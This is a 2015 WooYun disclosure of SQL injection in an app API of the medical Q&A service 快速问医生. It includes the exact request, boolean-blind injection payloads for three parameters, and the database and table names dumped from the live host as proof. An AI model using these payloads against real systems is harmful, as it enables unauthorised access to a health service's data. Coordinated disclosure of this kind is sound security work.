当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148501

漏洞标题:快速问医生某站SQL注射漏洞

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-22 10:34

修复时间:2015-12-07 11:00

公开时间:2015-12-07 11:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

快速问医生某站SQL注射漏洞:P

详细说明:

GET /common/lht?app=1&pos=0&os=a&token=562785a817d40&signature=72bc254bd98ae&once=1445430697 HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2S MIUI/JLB54.0)
Host: iapp.120.net
Connection: Keep-Alive
Accept-Encoding: gzip


三个参数、

---
Parameter: os (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=1&pos=0&os=a' AND 6032=6032 AND 'CVWl'='CVWl&token=562785a817d4
0&signature=72bc254bd98ae&once=1445430697
Parameter: pos (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=1&pos=0 AND 6322=6322&os=a&token=562785a817d40&signature=72bc25
4bd98ae&once=1445430697
Parameter: app (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=1 AND 7797=7797&pos=0&os=a&token=562785a817d40&signature=72bc25
4bd98ae&once=1445430697
---


漏洞证明:

database:

available databases [4]:
[*] `120app`
[*] information_schema
[*] other_app
[*] test


Database: 120app
[119 tables]
+---------------------------------+
| app_acne_category |
| app_acne_recipe |
| app_acne_relate |
| app_acne_test |
| app_admin |
| app_admin_panel |
| app_admin_role |
| app_admin_role_priv |
| app_appcenter |
| app_appcenter_category |
| app_appcenter_comment |
| app_appcenter_user_dynamic |
| app_article |
| app_attachment |
| app_attachment_index |
| app_cache |
| app_cesarean_content |
| app_cold |
| app_cold_favorites |
| app_cold_symptom |
| app_cookbook |
| app_cookbook_info |
| app_disease_eat |
| app_disease_eat_collect |
| app_disease_eat_collocation |
| app_disease_eat_diet |
| app_disease_find_doctor |
| app_disease_find_doctor_article |
| app_examine_article |
| app_examine_list |
| app_feedback |
| app_fx120_article |
| app_ipbanned |
| app_linkage |
| app_log |
| app_login_register_log |
| app_lose_weight |
| app_malady_doctor |
| app_malady_food_info |
| app_malady_food_method |
| app_menu |
| app_notice |
| app_public_article |
| app_session |
| app_shorturl |
| app_skin_product |
| app_skin_test |
| app_skin_type |
| app_solid_food_article |
| app_solid_food_cookbook |
| app_test |
| app_times |
| mapp_check_version |
| mapp_collect_count |
| mapp_diet |
| mapp_diet_detail |
| mapp_disease_count |
| mapp_download_count |
| mapp_extend |
| mapp_extend_count |
| mapp_extend_count_new |
| mapp_extend_new |
| mapp_feedback |
| mapp_feedback_type |
| mapp_folk_prescription |
| mapp_folk_prescription_detail |
| mapp_help |
| mapp_hot_keyword |
| mapp_hot_question |
| mapp_list_new_words |
| mapp_list_words |
| mapp_mobiles_area |
| mapp_msg_count |
| mapp_pre_install |
| mapp_product |
| mapp_product_comment |
| mapp_product_detail |
| mapp_product_ip |
| mapp_product_mobile |
| mapp_pv_diet |
| mapp_pv_drug |
| mapp_pv_folk |
| mapp_search_count |
| mapp_search_list |
| mapp_shunt_count |
| mapp_shunt_count_new |
| mapp_tongji |
| mapp_yyaq_collect |
| mapp_yyaq_common_disease |
| mapp_yyck_call |
| mapp_yyck_call_new |
| mapp_yyck_drug_comment |
| mapp_yyck_drug_news |
| mapp_yyck_drug_news2 |
| mapp_yyck_season_dis |
| mapp_yyck_shop_goods |
| mapp_yyck_shop_sort |
| mapp_yyck_wqh_count |
| mapp_zys_book_ds |
| mapp_zys_book_qs |
| mapp_zys_channel_count |
| mapp_zys_count |
| mapp_zys_count_new |
| mapp_zys_download_count |
| mapp_zys_hot_keyword |
| mapp_zys_keyword |
| mapp_zys_keyword_count |
| mapp_zys_new_area |
| mapp_zys_pvs_dept |
| mapp_zys_pvs_disease |
| mapp_zys_pvs_doctor |
| mapp_zys_pvs_hospital |
| mapp_zys_pvs_question |
| mapp_zys_question |
| mapp_zys_reg_book |
| mapp_zys_sort |
| mapp_zywb_buyservice |
| mapp_zywb_count |
| mapp_zywb_user |
+---------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-23 10:58

厂商回复:

确认此漏洞,非常感谢

最新状态:

暂无


漏洞评价:

评价